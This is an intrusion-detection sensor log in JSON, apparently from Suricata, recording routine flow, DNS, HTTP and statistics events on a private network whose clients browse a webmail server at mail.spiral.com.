{"timestamp":"2020-02-29T00:09:13.002042+0000","flow_id":1066967241298197,"event_type":"flow","src_ip":"192.168.10.81","src_port":52700,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":17,"pkts_toclient":21,"bytes_toserver":2524,"bytes_toclient":19141,"start":"2020-02-29T00:08:07.954645+0000","end":"2020-02-29T00:08:10.923602+0000","age":3,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"1f","tcp_flags_tc":"1b","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:09:14.000277+0000","event_type":"stats","stats":{"uptime":14206,"capture":{"kernel_packets":134195,"kernel_drops":0},"decoder":{"pkts":134204,"bytes":92704354,"invalid":185,"ipv4":132733,"ipv6":8,"ethernet":134204,"raw":0,"null":0,"sll":0,"tcp":127551,"udp":4982,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10002,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096768},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2730,"ssn_memcap_drop":0,"pseudo":343,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2746,"synack":2737,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1771,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2273,"failed_udp":110},"tx":{"http":4569,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2352}},"flow_mgr":{"closed_pruned":2709,"new_pruned":15,"est_pruned
":2322,"bypassed_pruned":0,"flows_checked":5,"flows_notimeout":2,"flows_timeout":3,"flows_timeout_inuse":1,"flows_removed":2,"rows_checked":65536,"rows_skipped":65530,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20832,"memcap_state":0,"memcap_global":0},"http":{"memuse":76072,"memcap":0}}} {"timestamp":"2020-02-29T00:09:14.001007+0000","flow_id":1835650407822727,"event_type":"flow","src_ip":"192.168.10.122","src_port":34876,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:04:13.095623+0000","end":"2020-02-29T00:04:13.201001+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:14.001181+0000","flow_id":1842054204037946,"event_type":"flow","src_ip":"192.168.10.122","src_port":56174,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:04:13.858938+0000","end":"2020-02-29T00:04:13.964382+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:14.001244+0000","flow_id":1596077147384852,"event_type":"flow","src_ip":"192.168.10.130","src_port":34766,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":8,"bytes_toserver":1237,"bytes_toclient":6071,"start":"2020-02-29T00:08:07.945172+0000","end":"2020-02-29T00:08:13.158534+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:09:15.521386+0000","flow_id":127932775662908,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52710,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":410},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":757,"tx_id":0}} {"timestamp":"2020-02-29T00:09:17.000561+0000","flow_id":422558938389413,"event_type":"flow","src_ip":"192.168.10.81","src_port":52704,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":5,"bytes_toserver":1227,"bytes_toclient":1755,"start":"2020-02-29T00:08:11.088997+0000","end":"2020-02-29T00:08:16.285131+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:09:17.822586+0000","flow_id":2001607963729589,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34778,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3336},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/","state":"CLOSED","stored":false,"size":16766,"tx_id":0}} 
{"timestamp":"2020-02-29T00:09:18.001282+0000","flow_id":1214726986095481,"event_type":"flow","src_ip":"192.168.10.122","src_port":48057,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:04:17.809849+0000","end":"2020-02-29T00:04:17.921212+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:21.000257+0000","event_type":"stats","stats":{"uptime":14213,"capture":{"kernel_packets":134227,"kernel_drops":0},"decoder":{"pkts":134227,"bytes":92710169,"invalid":185,"ipv4":132756,"ipv6":8,"ethernet":134227,"raw":0,"null":0,"sll":0,"tcp":127572,"udp":4984,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095040},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2731,"ssn_memcap_drop":0,"pseudo":343,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2747,"synack":2738,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1772,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2274,"failed_udp":110},"tx":{"http":4570,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2353}},"flow_mgr":{"closed_pruned":2712,"new_pruned":15,"est_pruned":2325,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked"
:65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":19839,"memcap_state":0,"memcap_global":0},"http":{"memuse":1937,"memcap":0}}} {"timestamp":"2020-02-29T00:09:23.000410+0000","flow_id":1027835779501480,"event_type":"flow","src_ip":"192.168.10.122","src_port":40419,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:04:22.216488+0000","end":"2020-02-29T00:04:22.321659+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:24.000231+0000","flow_id":1696278719705921,"event_type":"flow","src_ip":"192.168.10.122","src_port":56324,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:04:23.537409+0000","end":"2020-02-29T00:04:23.642729+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:24.001086+0000","flow_id":871752373023523,"event_type":"flow","src_ip":"192.168.10.122","src_port":50439,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:04:22.963363+0000","end":"2020-02-29T00:04:23.068671+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:24.001803+0000","flow_id":1497310064742804,"event_type":"flow","src_ip":"192.168.10.122","src_port":56584,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:04:23.725396+0000","end":"2020-02-29T00:04:23.830890+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:09:26.000361+0000","flow_id":1446393227616656,"event_type":"flow","src_ip":"192.168.10.122","src_port":43939,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:04:25.434576+0000","end":"2020-02-29T00:04:25.539965+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:26.001140+0000","flow_id":533480764378464,"event_type":"flow","src_ip":"192.168.10.81","src_port":52706,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1291,"bytes_toclient":1062,"start":"2020-02-29T00:08:20.363872+0000","end":"2020-02-29T00:08:25.580042+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:09:27.000298+0000","flow_id":2004988097150431,"event_type":"flow","src_ip":"192.168.10.130","src_port":34760,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":14,"pkts_toclient":18,"bytes_toserver":2119,"bytes_toclient":16868,"start":"2020-02-29T00:07:43.802271+0000","end":"2020-02-29T00:08:26.308021+0000","age":43,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:09:28.000219+0000","event_type":"stats","stats":{"uptime":14220,"capture":{"kernel_packets":134227,"kernel_drops":0},"decoder":{"pkts":134227,"bytes":92710169,"invalid":185,"ipv4":132756,"ipv6":8,"ethernet":134227,"raw":0,"null":0,"sll":0,"tcp":127572,"udp":4984,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093312},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2731,"ssn_memcap_drop":0,"pseudo":343,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2747,"synack":2738,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1772,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2274,"failed_udp":110},"tx":{"http":4570,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2353}},"flow_mgr":{"closed_pruned":2712,"new_pruned":15,"est_pruned":2329,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65531,"rows_empty":3,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18186,"memcap_state":0,"memcap_global":0},"http":{"memuse":1777,"memcap":0}}} 
{"timestamp":"2020-02-29T00:09:28.001781+0000","flow_id":2038445879581300,"event_type":"flow","src_ip":"192.168.10.122","src_port":123,"dest_ip":"154.11.146.39","dest_port":123,"proto":"UDP","app_proto":"failed","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":90,"bytes_toclient":90,"start":"2020-02-29T00:04:27.449140+0000","end":"2020-02-29T00:04:27.609675+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:30.000677+0000","flow_id":1612243390009016,"event_type":"flow","src_ip":"192.168.10.122","src_port":57135,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:04:29.495288+0000","end":"2020-02-29T00:04:29.600386+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:33.000442+0000","flow_id":1188136844541723,"event_type":"flow","src_ip":"192.168.10.122","src_port":47715,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:04:32.278299+0000","end":"2020-02-29T00:04:32.386792+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:33.000771+0000","flow_id":1403928886416178,"event_type":"flow","src_ip":"192.168.10.122","src_port":46632,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:04:32.103218+0000","end":"2020-02-29T00:04:32.211965+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:09:35.000237+0000","event_type":"stats","stats":{"uptime":14227,"capture":{"kernel_packets":134227,"kernel_drops":0},"decoder":{"pkts":134227,"bytes":92710169,"invalid":185,"ipv4":132756,"ipv6":8,"ethernet":134227,"raw":0,"null":0,"sll":0,"tcp":127572,"udp":4984,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10002,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7091872},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2731,"ssn_memcap_drop":0,"pseudo":343,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2747,"synack":2738,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1772,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2274,"failed_udp":110},"tx":{"http":4570,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2353}},"flow_mgr":{"closed_pruned":2714,"new_pruned":15,"est_pruned":2334,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":0,"flows_timeout":3,"flows_timeout_inuse":1,"flows_removed":2,"rows_checked":65536,"rows_skipped":65533,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":17193,"memcap_state":0,"memcap_global":0},"http":{"memuse":1777,"memcap":0}}} 
{"timestamp":"2020-02-29T00:09:40.005609+0000","flow_id":1506149123404467,"event_type":"flow","src_ip":"192.168.10.130","src_port":34768,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":12,"bytes_toserver":1233,"bytes_toclient":9789,"start":"2020-02-29T00:08:26.307891+0000","end":"2020-02-29T00:08:38.282721+0000","age":12,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:09:40.919718+0000","flow_id":653855817992358,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49092,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64267,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:09:41.000832+0000","flow_id":384277881088369,"event_type":"flow","src_ip":"192.168.10.122","src_port":53660,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:04:40.321905+0000","end":"2020-02-29T00:04:40.431524+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:41.001029+0000","flow_id":2230598437064297,"event_type":"flow","src_ip":"192.168.10.130","src_port":34770,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"failed","app_proto_tc":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":314,"bytes_toclient":820,"start":"2020-02-29T00:08:26.872041+0000","end":"2020-02-29T00:08:27.455695+0000","age":1,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"17","tcp_flags_tc":"1b","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:09:41.028314+0000","flow_id":653855817992358,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49092,"proto":"UDP","dns":{"type":"answer","id":64267,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:09:41.028314+0000","flow_id":653855817992358,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49092,"proto":"UDP","dns":{"type":"answer","id":64267,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:09:41.226094+0000","flow_id":1979596258201268,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34780,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6978}} 
{"timestamp":"2020-02-29T00:09:42.000194+0000","event_type":"stats","stats":{"uptime":14234,"capture":{"kernel_packets":134231,"kernel_drops":0},"decoder":{"pkts":134235,"bytes":92711293,"invalid":185,"ipv4":132764,"ipv6":8,"ethernet":134235,"raw":0,"null":0,"sll":0,"tcp":127579,"udp":4985,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7092160},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2732,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2748,"synack":2739,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1772,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2275,"failed_udp":110},"tx":{"http":4571,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2354}},"flow_mgr":{"closed_pruned":2715,"new_pruned":15,"est_pruned":2334,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":1,"flows_timeout":1,"flows_timeout_inuse":1,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":17193,"memcap_state":0,"memcap_global":0},"http":{"memuse":87370,"memcap":0}}} 
{"timestamp":"2020-02-29T00:09:44.645754+0000","flow_id":1943479878474362,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":41241,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":49461,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:09:44.754265+0000","flow_id":1943479878474362,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41241,"proto":"UDP","dns":{"type":"answer","id":49461,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:09:44.754265+0000","flow_id":1943479878474362,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41241,"proto":"UDP","dns":{"type":"answer","id":49461,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:09:44.893739+0000","flow_id":1388849276691051,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52712,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7849}} {"timestamp":"2020-02-29T00:09:46.232090+0000","flow_id":1979596258201268,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34780,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6978},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":37764,"tx_id":0}} {"timestamp":"2020-02-29T00:09:49.000241+0000","event_type":"stats","stats":{"uptime":14241,"capture":{"kernel_packets":134266,"kernel_drops":0},"decoder":{"pkts":134270,"bytes":92729762,"invalid":185,"ipv4":132795,"ipv6":8,"ethernet":134270,"raw":0,"null":0,"sll":0,"tcp":127607,"udp":4988,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7092160},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2733,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2749,"synack":2740,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1774,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2276,"failed_udp":110},"tx":{"http":4572,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2355}},"flow_mgr":{"closed_pruned":2716,"new_pruned":15,"est_pruned":2335,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":17523,"memcap_state":0,"memcap_global":0},"http":{"memuse
":156103,"memcap":0}}} {"timestamp":"2020-02-29T00:09:49.081618+0000","flow_id":1388849276691051,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52712,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7849},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":43730,"tx_id":0}} {"timestamp":"2020-02-29T00:09:49.091380+0000","flow_id":1254571419460852,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":45436,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":5327,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:09:49.199155+0000","flow_id":1254571419460852,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45436,"proto":"UDP","dns":{"type":"answer","id":5327,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} 